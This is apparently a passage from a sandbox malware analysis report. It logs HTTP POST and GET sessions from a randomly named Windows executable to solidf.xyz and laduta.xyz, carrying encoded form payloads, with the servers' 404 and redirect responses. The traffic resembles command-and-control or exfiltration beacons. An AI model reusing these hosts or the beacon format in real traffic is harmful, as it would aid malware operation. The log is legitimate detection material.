                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 72 6b 6c 5a 6b 44 55 70 7a 79 79 44 35 57 50 4e 38 67 7a 54 6b 38 67 47 66 75 70 4d 63 49 4d 36 72 50 58 50 37 7a 74 67 39 4f 69 48 38 6d 2f 4e 2b 4a 58 48 54 79 2b 33 54 46 52 7a 57 6e 33 32 32 67 69 76 59 6f 31 41 4a 71 33 49 72 70 65 73 4c 32 45 77 38 31 58 71 4e 55 5a 6b 66 6d 76 6e 69 61 47 6f 77 57 70 4d 6c 55 4a 54 48 61 49 2f 55 34 59 4b 73 37 39 65 4b 59 70 39 43 6f 79 32 71 65 73 65 52 51 46 4c 2b 71 70 71 67 48 78 36 4e 36 57 76 41 37 53 4a 37 43 49 4c 75 63 7a 79 31 6b 59 2b 4e 36 36 52 6c 4a 30 31 6d 41 52 36 4c 4f 4c 54 4b 59 30 70 79 68 55 79 6e 33 78 6d 50 59 65 63 39 31 35 59 44 39 63 65
                                                                                          Data Ascii: T4OdNH=rklZkDUpzyyD5WPN8gzTk8gGfupMcIM6rPXP7ztg9OiH8m/N+JXHTy+3TFRzWn322givYo1AJq3IrpesL2Ew81XqNUZkfmvniaGowWpMlUJTHaI/U4YKs79eKYp9Coy2qeseRQFL+qpqgHx6N6WvA7SJ7CILuczy1kY+N66RlJ01mAR6LOLTKY0pyhUyn3xmPYec915YD9ce
                                                                                          Jan 8, 2025 15:01:17.210994959 CET918INHTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:17 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 774
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          22192.168.2.649998199.192.21.169802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:01:19.175307989 CET784OUTPOST /stho/ HTTP/1.1
                                                                                          Host: www.solidf.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.solidf.xyz
                                                                                          Referer: http://www.solidf.xyz/stho/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 72 6b 6c 5a 6b 44 55 70 7a 79 79 44 34 32 66 4e 73 33 6e 54 6a 63 67 42 51 4f 70 4d 58 6f 4e 7a 72 50 54 50 37 78 41 37 38 37 36 48 79 6a 37 4e 34 37 76 48 51 79 2b 33 64 6c 52 38 62 48 33 70 32 67 2b 4e 59 73 31 41 4a 72 58 49 72 72 57 73 4b 46 63 7a 39 6c 58 6b 46 30 5a 6d 51 47 76 6e 69 61 47 6f 77 58 4d 6a 6c 55 52 54 41 70 41 2f 56 5a 59 4a 33 62 39 64 63 6f 70 39 47 6f 7a 2f 71 65 73 73 52 55 64 79 2b 6f 68 71 67 47 42 36 4e 72 57 75 50 37 53 50 31 69 4a 49 39 66 65 6b 76 46 68 65 48 61 36 6d 36 49 51 42 6e 32 4d 67 58 39 4c 77 59 49 55 72 79 6a 4d 41 6e 58 78 4d 4e 59 6d 63 76 69 31 2f 4d 4a 35 39 39 51 31 50 2f 49 6b 33 65 53 73 71 76 53 62 31 37 78 6c 33 2b 77 3d 3d
                                                                                          Data Ascii: T4OdNH=rklZkDUpzyyD42fNs3nTjcgBQOpMXoNzrPTP7xA7876Hyj7N47vHQy+3dlR8bH3p2g+NYs1AJrXIrrWsKFcz9lXkF0ZmQGvniaGowXMjlURTApA/VZYJ3b9dcop9Goz/qessRUdy+ohqgGB6NrWuP7SP1iJI9fekvFheHa6m6IQBn2MgX9LwYIUryjMAnXxMNYmcvi1/MJ599Q1P/Ik3eSsqvSb17xl3+w==
                                                                                          Jan 8, 2025 15:01:19.775543928 CET918INHTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:19 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 774
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          23192.168.2.649999199.192.21.169802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:01:21.718378067 CET1797OUTPOST /stho/ HTTP/1.1
                                                                                          Host: www.solidf.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.solidf.xyz
                                                                                          Referer: http://www.solidf.xyz/stho/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 72 6b 6c 5a 6b 44 55 70 7a 79 79 44 34 32 66 4e 73 33 6e 54 6a 63 67 42 51 4f 70 4d 58 6f 4e 7a 72 50 54 50 37 78 41 37 38 37 79 48 79 52 7a 4e 37 61 76 48 52 79 2b 33 56 46 51 62 62 48 32 7a 32 67 32 4a 59 73 77 33 4a 76 6e 49 71 49 4f 73 44 55 63 7a 7a 6c 58 6b 48 30 5a 6c 66 6d 76 79 69 5a 2b 73 77 57 38 6a 6c 55 52 54 41 6f 77 2f 53 49 59 4a 77 72 39 65 4b 59 70 35 43 6f 7a 54 71 61 41 38 52 55 52 69 2b 59 42 71 67 6c 70 36 4c 5a 2b 75 43 37 53 4e 32 69 4a 71 39 66 54 36 76 45 4e 6b 48 5a 6e 7a 36 4a 6f 42 71 44 68 47 53 4d 50 32 4b 4a 77 56 73 69 34 6d 72 53 70 39 55 4a 36 6d 76 68 70 33 42 49 4e 45 6a 32 42 2b 38 72 55 79 54 77 73 34 68 6b 75 35 33 79 55 4d 70 43 38 35 6a 66 47 6c 57 68 69 63 62 64 61 64 35 6e 2b 64 38 4b 79 44 33 6d 6a 45 68 75 68 4f 72 6e 76 4a 33 72 2f 4c 32 58 56 42 75 6d 4b 74 76 36 75 44 37 48 57 62 68 2f 4b 35 37 30 54 58 59 33 52 5a 70 47 47 32 6f 35 70 36 66 74 4e 41 47 2b 49 4c 70 38 50 31 4f 58 35 6a 38 47 38 53 30 4c 5a 31 6a 61 48 4b 4d 6b 73 [TRUNCATED]
                                                                                          Data Ascii: T4OdNH=rklZkDUpzyyD42fNs3nTjcgBQOpMXoNzrPTP7xA787yHyRzN7avHRy+3VFQbbH2z2g2JYsw3JvnIqIOsDUczzlXkH0ZlfmvyiZ+swW8jlURTAow/SIYJwr9eKYp5CozTqaA8RURi+YBqglp6LZ+uC7SN2iJq9fT6vENkHZnz6JoBqDhGSMP2KJwVsi4mrSp9UJ6mvhp3BINEj2B+8rUyTws4hku53yUMpC85jfGlWhicbdad5n+d8KyD3mjEhuhOrnvJ3r/L2XVBumKtv6uD7HWbh/K570TXY3RZpGG2o5p6ftNAG+ILp8P1OX5j8G8S0LZ1jaHKMksXajf+sp0gWUM6rL/hhzZSMFTJ01jiY/ACkqS0IpZDXX6vlbbYGuOsOE3hGwQsEOhQxRLU/L07JQFUzc3UnZv3b8sdJagUYtln4gR7RJnS58HjqMPw9g/8nb9pBW6PFRfn8gXSyWdqhI5dtAvGKqhN0i9kSVnB2SCr1A2PceLbb4aA6bR+Pcw6f7mGijdZUeYCLckNIx0MugQekIIc+9desB9pqe8i80OqQa+kZKeskASrter/iYCQ/aTj6aUlGTSzhOSe8fo0rSQQub6oOvLcCS7VoZhBh5LV7HfaszKXO/54aMWxbVJq0v2K7yVM+az5kT4s+hvAoyCPWvYXrDF7RP93mUgZ044wkWixe5KwJEygWrlIjBi+w+PvgfA389DeFryQU6gqDBGLG3LLqwYCvXss4vYP3mVuUW/NICb5yjAQzrFzKe6VIc9ckvuvD0yFbg8qiG9a2xgNHlpLeMDycbQ6cdAkl6P15d0/M3tSlwd3misWVBk4JwX2WZ6IBPzERffc+XttinXA4uS9hj0+y0gqShR9nVqWQYrKZ/cj8nkHMKpNveToUu7W8/WjHyLNi004ib/J6byH4byR02O5eR701AJCK4YgJhgEeIQhq5lOxDboa2y3lDFV7HwvoxLCRkaQzUJE42MefaxiXsxJ7C9TpYbSGRsfH [TRUNCATED]
                                                                                          Jan 8, 2025 15:01:23.190547943 CET918INHTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:22 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 774
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          24192.168.2.650000199.192.21.169802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:01:24.259267092 CET511OUTGET /stho/?T4OdNH=mmN5n3cJgwCS/hPSyyDLsNIVXPMNWoUq1Zr31hV11eqK/h/PlpONTBiAVWsNASboghm0fbZ0NPzr87fjFnRbzCyOI219SS/ig8yR+3V4slRmOpkmcKIusrBtdNsAS/Tkjrlhc08=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.solidf.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:01:24.874818087 CET933INHTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:24 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 774
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          25192.168.2.650001192.64.119.109802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:01:29.931911945 CET760OUTPOST /5mxq/ HTTP/1.1
                                                                                          Host: www.laduta.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.laduta.xyz
                                                                                          Referer: http://www.laduta.xyz/5mxq/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 76 4d 56 59 53 69 56 73 42 6a 73 2b 5a 77 6d 42 63 30 33 53 45 45 4a 74 74 73 61 58 6e 64 75 6a 71 46 63 37 74 49 5a 41 6d 61 54 6c 55 2b 45 33 4d 4e 34 6a 4a 48 34 54 57 4d 35 75 32 53 36 70 41 47 41 73 31 76 2f 4b 58 56 79 6a 44 49 6f 31 62 65 41 2b 38 6d 72 7a 44 4b 72 71 64 77 2b 4e 6b 56 45 76 59 4d 71 30 4f 6f 2b 4e 4e 52 34 48 53 37 31 6b 55 58 32 48 75 72 30 45 43 4d 76 51 73 64 41 50 37 39 30 37 47 50 30 5a 6f 34 46 4c 70 4d 75 35 54 4f 74 42 32 50 50 62 4b 4e 63 42 79 46 56 76 35 4e 42 43 77 56 77 6e 37 46 47 61 45 75 35 36 32 48 75 4a 76 59 4f 30 45 6e 52 56 6d 46 6f 50 46 48 72 38 43 71 4c 2b
                                                                                          Data Ascii: T4OdNH=vMVYSiVsBjs+ZwmBc03SEEJttsaXndujqFc7tIZAmaTlU+E3MN4jJH4TWM5u2S6pAGAs1v/KXVyjDIo1beA+8mrzDKrqdw+NkVEvYMq0Oo+NNR4HS71kUX2Hur0ECMvQsdAP7907GP0Zo4FLpMu5TOtB2PPbKNcByFVv5NBCwVwn7FGaEu562HuJvYO0EnRVmFoPFHr8CqL+
                                                                                          Jan 8, 2025 15:01:30.427824974 CET193INHTTP/1.1 302 Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:30 GMT
                                                                                          Content-Length: 0
                                                                                          Connection: close
                                                                                          Location: https://laduta.xyz/5mxq
                                                                                          X-Served-By: Namecheap URL Forward
                                                                                          Server: namecheap-nginx


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          26192.168.2.650002192.64.119.109802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:01:32.485991001 CET784OUTPOST /5mxq/ HTTP/1.1
                                                                                          Host: www.laduta.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.laduta.xyz
                                                                                          Referer: http://www.laduta.xyz/5mxq/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 76 4d 56 59 53 69 56 73 42 6a 73 2b 4c 44 75 42 5a 54 72 53 42 6b 4a 69 68 4d 61 58 75 39 75 6e 71 46 59 37 74 4a 73 46 6d 6f 33 6c 4e 65 55 33 4e 49 45 6a 45 6e 34 54 43 63 35 76 79 53 37 6c 41 47 4e 54 31 75 54 4b 58 56 4f 6a 44 49 34 31 62 75 38 2f 39 32 72 78 50 71 72 73 54 51 2b 4e 6b 56 45 76 59 4d 2b 65 4f 6f 6d 4e 4e 46 38 48 54 5a 4e 6e 58 58 32 45 2b 62 30 45 4a 73 76 55 73 64 41 35 37 34 55 52 47 4e 63 5a 6f 34 31 4c 70 5a 4f 34 4b 2b 74 48 34 76 4f 5a 4f 59 42 32 79 6b 63 38 2f 2b 74 7a 67 46 30 6e 36 7a 62 41 59 64 35 5a 6b 58 4f 4c 76 61 57 47 45 48 52 2f 6b 46 51 50 58 51 6e 62 4e 65 75 64 48 47 31 70 50 54 33 43 71 71 71 7a 48 71 59 6e 37 30 39 59 52 77 3d 3d
                                                                                          Data Ascii: T4OdNH=vMVYSiVsBjs+LDuBZTrSBkJihMaXu9unqFY7tJsFmo3lNeU3NIEjEn4TCc5vyS7lAGNT1uTKXVOjDI41bu8/92rxPqrsTQ+NkVEvYM+eOomNNF8HTZNnXX2E+b0EJsvUsdA574URGNcZo41LpZO4K+tH4vOZOYB2ykc8/+tzgF0n6zbAYd5ZkXOLvaWGEHR/kFQPXQnbNeudHG1pPT3CqqqzHqYn709YRw==
                                                                                          Jan 8, 2025 15:01:32.966286898 CET193INHTTP/1.1 302 Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:32 GMT
                                                                                          Content-Length: 0
                                                                                          Connection: close
                                                                                          Location: https://laduta.xyz/5mxq
                                                                                          X-Served-By: Namecheap URL Forward
                                                                                          Server: namecheap-nginx


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          27192.168.2.650003192.64.119.109802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:01:35.033380032 CET1797OUTPOST /5mxq/ HTTP/1.1
                                                                                          Host: www.laduta.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.laduta.xyz
                                                                                          Referer: http://www.laduta.xyz/5mxq/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 76 4d 56 59 53 69 56 73 42 6a 73 2b 4c 44 75 42 5a 54 72 53 42 6b 4a 69 68 4d 61 58 75 39 75 6e 71 46 59 37 74 4a 73 46 6d 6f 2f 6c 4e 49 59 33 4c 72 73 6a 46 6e 34 54 42 63 35 71 79 53 37 6f 41 47 45 61 31 75 4f 6f 58 54 4b 6a 43 71 41 31 64 63 59 2f 7a 32 72 78 56 4b 72 74 64 77 2b 55 6b 56 55 30 59 4d 75 65 4f 6f 6d 4e 4e 44 51 48 54 4c 31 6e 62 33 32 48 75 72 30 41 43 4d 76 38 73 64 49 70 37 34 51 72 47 39 38 5a 70 63 52 4c 6f 74 75 34 56 4f 74 46 37 76 4f 37 4f 59 46 70 79 6b 51 77 2f 2f 59 75 67 43 38 6e 32 57 6d 35 50 75 46 74 6c 45 75 51 38 4e 6d 77 44 77 39 54 38 33 45 54 55 57 37 38 54 75 57 41 45 54 39 51 4d 42 71 6f 6a 4b 69 79 45 71 4e 71 2b 6e 77 77 44 44 48 36 57 6f 53 6f 72 44 42 51 6e 4e 6c 48 61 58 65 39 4b 4b 6d 74 30 53 2f 71 65 43 36 68 7a 59 6a 39 6f 45 6b 2f 2f 56 33 42 61 67 48 65 42 43 45 54 48 75 50 4d 4c 34 49 30 51 64 62 4d 79 76 6e 31 56 34 36 2f 38 78 63 71 2f 2b 4c 4d 61 39 2b 4d 63 4a 63 59 70 6f 4b 58 67 6c 4a 61 67 75 58 51 43 69 79 49 78 46 44 [TRUNCATED]
